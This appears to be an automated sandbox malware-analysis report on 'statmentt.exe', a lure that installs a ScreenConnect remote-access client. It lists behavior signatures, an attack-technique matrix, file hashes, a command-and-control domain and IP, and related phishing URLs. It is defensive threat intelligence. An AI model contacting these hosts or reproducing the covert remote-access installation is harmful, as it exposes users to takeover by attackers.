                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Client.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Core.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeCode function: 7_2_058304EC CreateNamedPipeW,7_2_058304EC
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeCode function: 7_2_01904D30 RtlGetVersion,7_2_01904D30
                              Source: C:\Users\user\Desktop\statmentt.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                              Lowering of HIPS / PFW / Operating System Security Settings

                              barindex
                              Source: C:\Windows\System32\msiexec.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa Authentication PackagesJump to behavior
                              Source: Yara matchFile source: statmentt.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.2.statmentt.exe.5b10000.9.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 8.2.ScreenConnect.WindowsClient.exe.24bfa20.0.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 8.0.ScreenConnect.WindowsClient.exe.a0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.0.statmentt.exe.c85db8.4.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.2.statmentt.exe.5b10000.9.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.0.statmentt.exe.c5c3d8.3.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.0.statmentt.exe.bd63d8.2.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 9.2.ScreenConnect.WindowsClient.exe.32efa60.4.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.0.statmentt.exe.bc0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000000.00000002.1802003851.0000000005B10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000008.00000000.1837493659.00000000000A2000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000008.00000002.3027011781.0000000002441000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000000.1770182468.0000000000BD6000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000002.1785575924.0000000003251000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000009.00000002.1889347392.0000000003271000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: statmentt.exe PID: 7408, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7632, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 7856, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 8012, type: MEMORYSTR
                              Source: Yara matchFile source: C:\Config.Msi\68f19a.rbs, type: DROPPED
                              Source: Yara matchFile source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Windows\Installer\MSIF458.tmp, type: DROPPED
                              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                              Gather Victim Identity InformationAcquire Infrastructure1
                              Valid Accounts
                              31
                              Windows Management Instrumentation
                              1
                              DLL Side-Loading
                              1
                              DLL Side-Loading
                              11
                              Disable or Modify Tools
                              OS Credential Dumping11
                              Peripheral Device Discovery
                              Remote Services11
                              Archive Collected Data
                              2
                              Encrypted Channel
                              Exfiltration Over Other Network MediumAbuse Accessibility Features
                              CredentialsDomains1
                              Replication Through Removable Media
                              1
                              Native API
                              1
                              DLL Search Order Hijacking
                              1
                              DLL Search Order Hijacking
                              1
                              Deobfuscate/Decode Files or Information
                              LSASS Memory1
                              File and Directory Discovery
                              Remote Desktop ProtocolData from Removable Media1
                              Non-Standard Port
                              Exfiltration Over BluetoothNetwork Denial of Service
                              Email AddressesDNS ServerDomain Accounts12
                              Command and Scripting Interpreter
                              1
                              Component Object Model Hijacking
                              1
                              Component Object Model Hijacking
                              1
                              Obfuscated Files or Information
                              Security Account Manager45
                              System Information Discovery
                              SMB/Windows Admin SharesData from Network Shared Drive1
                              Non-Application Layer Protocol
                              Automated ExfiltrationData Encrypted for Impact
                              Employee NamesVirtual Private ServerLocal AccountsCron1
                              Valid Accounts
                              1
                              Valid Accounts
                              1
                              Software Packing
                              NTDS21
                              Security Software Discovery
                              Distributed Component Object ModelInput Capture1
                              Application Layer Protocol
                              Traffic DuplicationData Destruction
                              Gather Victim Network InformationServerCloud AccountsLaunchd2
                              Windows Service
                              1
                              Access Token Manipulation
                              1
                              DLL Side-Loading
                              LSA Secrets2
                              Process Discovery
                              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                              Domain PropertiesBotnetReplication Through Removable MediaScheduled Task1
                              Bootkit
                              2
                              Windows Service
                              1
                              DLL Search Order Hijacking
                              Cached Domain Credentials51
                              Virtualization/Sandbox Evasion
                              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items13
                              Process Injection
                              1
                              File Deletion
                              DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job122
                              Masquerading
                              Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                              Valid Accounts
                              /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                              Access Token Manipulation
                              Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                              Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd51
                              Virtualization/Sandbox Evasion
                              Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                              Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task13
                              Process Injection
                              KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
                              Determine Physical LocationsVirtual Private ServerCompromise Hardware Supply ChainUnix ShellSystemd TimersSystemd Timers1
                              Hidden Users
                              GUI Input CapturePermission Groups DiscoveryReplication Through Removable MediaEmail CollectionProxyExfiltration over USBNetwork Denial of Service
                              Business RelationshipsServerTrusted RelationshipVisual BasicContainer Orchestration JobContainer Orchestration Job1
                              Bootkit
                              Web Portal CaptureLocal GroupsComponent Object Model and Distributed COMLocal Email CollectionInternal ProxyCommonly Used PortDirect Network Flood
                              Identify Business TempoBotnetHardware AdditionsPythonHypervisorProcess Injection1
                              Rundll32
                              Credential API HookingDomain GroupsExploitation of Remote ServicesRemote Email CollectionExternal ProxyTransfer Data to Cloud AccountReflection Amplification
                              Hide Legend

                              Legend:

                              • Process
                              • Signature
                              • Created File
                              • DNS/IP Info
                              • Is Dropped
                              • Is Windows Process
                              • Number of created Registry Values
                              • Number of created Files
                              • Visual Basic
                              • Delphi
                              • Java
                              • .Net C# or VB.NET
                              • C, C++ or other language
                              • Is malicious
                              • Internet
                              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1578432 Sample: statmentt.exe Startdate: 19/12/2024 Architecture: WINDOWS Score: 48 55 yell64u.top 2->55 61 Multi AV Scanner detection for submitted file 2->61 63 .NET source code contains potential unpacker 2->63 65 .NET source code references suspicious native API functions 2->65 67 5 other signatures 2->67 8 msiexec.exe 94 51 2->8         started        12 ScreenConnect.ClientService.exe 2 5 2->12         started        15 statmentt.exe 5 2->15         started        signatures3 process4 dnsIp5 35 ScreenConnect.Wind...dentialProvider.dll, PE32+ 8->35 dropped 37 C:\...\ScreenConnect.WindowsClient.exe, PE32 8->37 dropped 39 C:\...\ScreenConnect.ClientService.exe, PE32 8->39 dropped 43 10 other files (1 malicious) 8->43 dropped 73 Enables network access during safeboot for specific services 8->73 75 Modifies security policies related information 8->75 17 msiexec.exe 8->17         started        19 msiexec.exe 1 8->19         started        21 msiexec.exe 8->21         started        57 yell64u.top 85.239.34.190, 49731, 8880 RAINBOW-HKRainbownetworklimitedHK Russian Federation 12->57 77 Reads the Security eventlog 12->77 79 Reads the System eventlog 12->79 23 ScreenConnect.WindowsClient.exe 3 12->23         started        26 ScreenConnect.WindowsClient.exe 2 12->26         started        41 C:\Users\user\AppData\...\statmentt.exe.log, ASCII 15->41 dropped 81 Contains functionality to hide user accounts 15->81 28 msiexec.exe 6 15->28         started        file6 signatures7 process8 file9 31 rundll32.exe 11 17->31         started        69 Creates files in the system32 config directory 23->69 71 Contains functionality to hide user accounts 23->71 45 C:\Users\user\AppData\Local\...\MSIEC0B.tmp, PE32 28->45 dropped signatures10 process11 file12 47 C:\Users\user\...\ScreenConnect.Windows.dll, PE32 31->47 dropped 49 C:\...\ScreenConnect.InstallerActions.dll, PE32 31->49 dropped 51 C:\Users\user\...\ScreenConnect.Core.dll, PE32 31->51 dropped 53 4 other files (none is malicious) 31->53 dropped 59 Contains functionality to hide user accounts 31->59 signatures13

                              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                              windows-stand
                              SourceDetectionScannerLabelLink
                              statmentt.exe21%ReversingLabsWin32.PUA.ConnectWise
                              SourceDetectionScannerLabelLink
                              C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Client.dll0%ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.dll0%ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe0%ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Core.dll0%ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Windows.dll0%ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsAuthenticationPackage.dll0%ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsBackstageShell.exe0%ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe0%ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsCredentialProvider.dll0%ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsFileManager.exe0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\MSIEC0B.tmp0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\MSIEC0B.tmp-\Microsoft.Deployment.Compression.Cab.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\MSIEC0B.tmp-\Microsoft.Deployment.Compression.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\MSIEC0B.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\MSIEC0B.tmp-\Microsoft.Deployment.WindowsInstaller.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\MSIEC0B.tmp-\ScreenConnect.Core.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\MSIEC0B.tmp-\ScreenConnect.InstallerActions.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\MSIEC0B.tmp-\ScreenConnect.Windows.dll0%ReversingLabs
                              C:\Windows\Installer\MSIF488.tmp0%ReversingLabs
                              C:\Windows\Installer\MSIF739.tmp0%ReversingLabs
                              No Antivirus matches
                              No Antivirus matches
                              No Antivirus matches
                              NameIPActiveMaliciousAntivirus DetectionReputation
                              yell64u.top
                              85.239.34.190
                              truetrue
                                unknown
                                NameSourceMaliciousAntivirus DetectionReputation
                                http://wixtoolset.org/releases/rundll32.exe, 00000004.00000003.1797343933.0000000004203000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1797154534.000000000437C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1797154534.000000000430D000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.WindowsInstaller.dll.4.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.4.dr, Microsoft.Deployment.Compression.dll.4.dr, Microsoft.Deployment.Compression.Cab.dll.4.drfalse
                                  high
                                  http://wixtoolset.org/news/rundll32.exe, 00000004.00000003.1797343933.0000000004203000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1797154534.000000000437C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1797154534.000000000430D000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.WindowsInstaller.dll.4.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.4.dr, Microsoft.Deployment.Compression.dll.4.dr, Microsoft.Deployment.Compression.Cab.dll.4.drfalse
                                    high
                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameScreenConnect.ClientService.exe, 00000007.00000002.3028562442.0000000001C7A000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1889347392.0000000003271000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://wixtoolset.org/Whttp://wixtoolset.org/telemetry/vrundll32.exe, 00000004.00000003.1797343933.0000000004203000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1797154534.000000000437C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1797154534.000000000430D000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.WindowsInstaller.dll.4.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.4.dr, Microsoft.Deployment.Compression.dll.4.dr, Microsoft.Deployment.Compression.Cab.dll.4.drfalse
                                        high
                                        https://feedback.screenconnect.com/Feedback.axdScreenConnect.Core.dll.2.drfalse
                                          high
                                          https://docs.rs/getrandom#nodejs-es-module-supportScreenConnect.WindowsCredentialProvider.dll.2.drfalse
                                            high
                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs
                                            IPDomainCountryFlagASNASN NameMalicious
                                            85.239.34.190
                                            yell64u.topRussian Federation
                                            134121RAINBOW-HKRainbownetworklimitedHKtrue
                                            Joe Sandbox version:41.0.0 Charoite
                                            Analysis ID:1578432
                                            Start date and time:2024-12-19 17:28:07 +01:00
                                            Joe Sandbox product:CloudBasic
                                            Overall analysis duration:0h 8m 21s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                            Number of analysed new started processes analysed:14
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:0
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Sample name:statmentt.exe
                                            Detection:MAL
                                            Classification:mal48.evad.winEXE@17/56@1/1
                                            EGA Information:
                                            • Successful, ratio: 60%
                                            HCA Information:
                                            • Successful, ratio: 79%
                                            • Number of executed functions: 225
                                            • Number of non-executed functions: 1
                                            Cookbook Comments:
                                            • Found application associated with file extension: .exe
                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                            • Excluded IPs from analysis (whitelisted): 52.149.20.212, 13.107.246.63
                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                            • Execution Graph export aborted for target rundll32.exe, PID 7632 because it is empty
                                            • Execution Graph export aborted for target statmentt.exe, PID 7408 because it is empty
                                            • Not all processes where analyzed, report is missing behavior information
                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                            • Report size getting too big, too many NtSetInformationFile calls found.
                                            • VT rate limit hit for: statmentt.exe
                                            No simulations
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            85.239.34.190statsment.exeGet hashmaliciousScreenConnect ToolBrowse
                                              setup.msiGet hashmaliciousScreenConnect ToolBrowse
                                                statments.exeGet hashmaliciousScreenConnect ToolBrowse
                                                  sstatment.exeGet hashmaliciousScreenConnect ToolBrowse
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    yell64u.topstatsment.exeGet hashmaliciousScreenConnect ToolBrowse
                                                    • 85.239.34.190
                                                    setup.msiGet hashmaliciousScreenConnect ToolBrowse
                                                    • 85.239.34.190
                                                    statments.exeGet hashmaliciousScreenConnect ToolBrowse
                                                    • 85.239.34.190
                                                    sstatment.exeGet hashmaliciousScreenConnect ToolBrowse
                                                    • 85.239.34.190
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    RAINBOW-HKRainbownetworklimitedHKppc.elfGet hashmaliciousMiraiBrowse
                                                    • 85.239.34.134
                                                    sh4.elfGet hashmaliciousMiraiBrowse
                                                    • 85.239.34.134
                                                    mips.elfGet hashmaliciousMiraiBrowse
                                                    • 85.239.34.134
                                                    spc.elfGet hashmaliciousMiraiBrowse
                                                    • 85.239.34.134
                                                    arm6.elfGet hashmaliciousMiraiBrowse
                                                    • 85.239.34.134
                                                    arm.elfGet hashmaliciousMiraiBrowse
                                                    • 85.239.34.134
                                                    m68k.elfGet hashmaliciousMiraiBrowse
                                                    • 85.239.34.134
                                                    arm7.elfGet hashmaliciousMiraiBrowse
                                                    • 85.239.34.134
                                                    x86.elfGet hashmaliciousMiraiBrowse
                                                    • 85.239.34.134
                                                    mpsl.elfGet hashmaliciousMiraiBrowse
                                                    • 85.239.34.134
                                                    No context
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Client.dllsupport.Client.exeGet hashmaliciousScreenConnect ToolBrowse
                                                      statsment.exeGet hashmaliciousScreenConnect ToolBrowse
                                                        https://cloudserver-filesredir667900989385.s3.eu-central-1.amazonaws.com/6354799604_PDF.htmlGet hashmaliciousScreenConnect ToolBrowse
                                                          https://cloudserver-filesredir667900989385.s3.eu-central-1.amazonaws.com/6354799604_PDF.htmlGet hashmaliciousScreenConnect ToolBrowse
                                                            file.exeGet hashmaliciousScreenConnect ToolBrowse
                                                              setup.msiGet hashmaliciousScreenConnect ToolBrowse
                                                                monthly-eStatementForum120478962.Client.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                  monthly-eStatementForum120478962.Client.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                    pzPO97QouM.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                      pzPO97QouM.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                        C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.dllsupport.Client.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                          statsment.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                            https://cloudserver-filesredir667900989385.s3.eu-central-1.amazonaws.com/6354799604_PDF.htmlGet hashmaliciousScreenConnect ToolBrowse
                                                                              https://cloudserver-filesredir667900989385.s3.eu-central-1.amazonaws.com/6354799604_PDF.htmlGet hashmaliciousScreenConnect ToolBrowse
                                                                                file.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                  setup.msiGet hashmaliciousScreenConnect ToolBrowse
                                                                                    monthly-eStatementForum120478962.Client.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                      monthly-eStatementForum120478962.Client.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                        pzPO97QouM.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                          pzPO97QouM.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                            File Type:data
                                                                                            Category:modified
                                                                                            Size (bytes):219646
                                                                                            Entropy (8bit):6.5820771589175235
                                                                                            Encrypted:false
                                                                                            SSDEEP:3072:85Z9LUHM7ptZ8UKOGw5vMWSuRy1YaDJkflQn3H+QDO/6Q+cxbr0qMGEd:85ZuH2aCGw1ST1wQLdqvEd
                                                                                            MD5:0E9702E471E40BC4ACBB2C863E0A27D4
                                                                                            SHA1:A186142117E5DA8B3FF44B0C133B7C949E2EDCE2
                                                                                            SHA-256:93E09E36B87DB3D31C142660401C1821B3DF09EC0FAE835E2517D71244422694
                                                                                            SHA-512:91462330C5EC940852320BDD73A7C6F38BEF9AC7F3B84F45C29555AB9E412E1A36A87126433E47645BCF7077E1B0C231BABB0D33CEE2955CCB80ECD8D5132AD9
                                                                                            Malicious:false
                                                                                            Yara Hits:
                                                                                            • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Config.Msi\68f19a.rbs, Author: Joe Security
                                                                                            Preview:...@IXOS.@.....@.[.Y.@.....@.....@.....@.....@.....@......&.{2750A569-82DB-B303-FEC6-22A2E87A0AD0}'.ScreenConnect Client (de5851ad6e374ce3)..setup.msi.@.....@.....@.....@......DefaultIcon..&.{2750A569-82DB-B303-FEC6-22A2E87A0AD0}.....@.....@.....@.....@.......@.....@.....@.......@....'.ScreenConnect Client (de5851ad6e374ce3)......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{AF52190F-9138-8DD5-E284-9AF07DDE1216}&.{2750A569-82DB-B303-FEC6-22A2E87A0AD0}.@......&.{5462DCDA-B5AB-15F8-7838-2A54948A34EB}&.{2750A569-82DB-B303-FEC6-22A2E87A0AD0}.@......&.{41277B46-8511-4FBD-DF82-7BFA9BAEED18}&.{2750A569-82DB-B303-FEC6-22A2E87A0AD0}.@......&.{E2565D0B-BCDD-C1A1-A2A2-7660FC61A23D}&.{2750A569-82DB-B303-FEC6-22A2E87A0AD0}.@......&.{A9BEA7A3-6285-A159-CBF3-596C269E6678}&.{2750A569-82DB-B303-FEC6-22A2E87A0AD0}.@......&.{567A6AC5-C59B-6D1E-4D5E-D3E6B358A6AB}&.{2750A569-82DB-B303-FEC6-22A2E87A0AD0}.@....
                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):652
                                                                                            Entropy (8bit):4.646296001566109
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:rHy2DLI4MWonY6c/KItfU49cAjUPDLm184c7eA7d5TlO5FMDKt5cFqu+HIR:zHE4rbM2xjU7M8LD7DTlcFq0qEIR
                                                                                            MD5:8B45555EF2300160892C25F453098AA4
                                                                                            SHA1:0992EBA6A12F7A25C1F50566BEEB3A72D4B93461
                                                                                            SHA-256:75552351B688F153370B86713C443AC7013DF3EE8FCAC004B2AB57501B89B225
                                                                                            SHA-512:F99FF9A04675E11BAF1FD2343AB9CE3066BAB32E6BD18AEA9344960BF0A14AF8191DDCCA8431AD52D907BCB0CB47861FFB2CD34655F1852D51E04ED766F03505
                                                                                            Malicious:false
                                                                                            Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP....4..2...n_Q2T}........Z...5...........0A.p.p.l.i.c.a.t.i.o.n.D.i.r.e.c.t.o.r.y.N.a.m.e..... A.p.p.l.i.c.a.t.i.o.n.T.i.t.l.e.....2B.l.a.n.k.M.o.n.i.t.o.r.M.e.s.s.a.g.e.F.o.r.m.a.t.....RE.n.d.P.o.i.n.t.S.t.a.t.u.s.S.l.e.e.p.i.n.g.F.o.r.F.r.e.e.L.i.c.e.n.s.e.T.i.t.l.e.F...FS.e.s.s.i.o.n.I.n.v.a.l.i.d.S.e.s.s.i.o.n.D.e.l.e.t.e.d.M.e.s.s.a.g.e.t.....Support..Support.2Software is Updating.Do not turn off your computer.,Not enough data receiving from host computer..Removed
                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):21018
                                                                                            Entropy (8bit):7.841465962209068
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:rcoN78dB74dN78dB74dN78dB74dN78dB74dN78dB74dN78dB74dN78dB74dN78dH:P4Bsj4Bsj4Bsj4Bsj4Bsj4Bsj4Bsj4Bd
                                                                                            MD5:EF6DBD4F9C3BB57F1A2C4AF2847D8C54
                                                                                            SHA1:41D9329C5719467E8AE8777C2F38DE39F02F6AE4
                                                                                            SHA-256:0792210DE652583423688FE6ACAE19F3381622E85992A771BF5E6C5234DBEB8E
                                                                                            SHA-512:5D5D0505874DC02832C32B05F7E49EAD974464F6CB50C27CE9393A23FF965AA66971B3C0D98E2A4F28C24147FCA7A0A9BFD25909EC7D5792AD40CED7D51ED839
                                                                                            Malicious:false
                                                                                            Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP......jF.1P)..../._.ks`.k.`.k.M6pb.......'...........w.......P...1......."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.1.6.....$A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.2.5.6....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.3.2....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.4.8.....,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.B.l.a.n.k.1.6..'..(A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.M.a.c.2.2..1..0A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.O.p.a.q.u.e.1.9.2..;..,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.T.i.t.l.e.1.6..E..6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.C.o.l.o.r.xO.. .....PNG........IHDR...-...-.....:......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.......C......pHYs...:...:..d.J...NIDATX...{pT.......$\..................h.m+Z.....I.R.... X.E...V+.^.......i...F.;..IDH..?.l. ..S.qxg2...}.../.y.......r1E..?......*.K[...D.../L....u..n....$!R..Jh...?.dSUX..*.V%..Jy.-.
                                                                                            Process:C:\Windows\System32\msiexec.exe
